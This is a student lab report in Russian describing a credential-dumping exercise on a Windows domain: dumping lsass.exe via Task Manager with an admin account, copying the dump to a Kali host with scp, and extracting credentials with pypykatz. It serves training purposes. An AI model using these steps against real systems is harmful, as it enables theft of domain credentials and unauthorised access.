# Windows_Basic-Фадеев_Александр-Практика-3
## Часть 1. Анализ памяти Lsass.exe
Зайдём под учетной записью Ольги и попробуем обратиться к ресурсам домена.

Выйдим из учетной записи и зайдем под Petr
Запустим командную строку от имени администратора
Так как Petr не является администратором PC1, введем данные ADMPetr
Введём команду whoami, чтобы проверить, кто мы

Запустим диспетчер задач от имени администратора ADMPetr
Перейдем в раздел подробности и найдем lsass.exe
Нажимаем ПКМ и создаем дамп файла.

Запускаем kali linux, включаем ssh для передачи файла.

Настроим статический ip адрес

Вернёмся в Win10 и с помощью командной строки, запущенной от имени ADMPetr передадим файл на kali. Нужно подтвердить fingerprint (yes)

Использованная команда:
`scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP kali@192.168.10.122:/home/kali`
Проверим, что на kali файл присутствует

Переключимся в директорию с lsass и скачаем скрипт pypykatz
```
cd /home/kali
git clone <https://github.com/skelsec/pypykatz
```
Перейдём в директорию pypycatz и выполним скрипт, применив его к скачанному ранее дампу
```
pypykatz lsa minidump lsass.DMP
```

Увидим учетные данные, которые скрипт достал из процесса lsass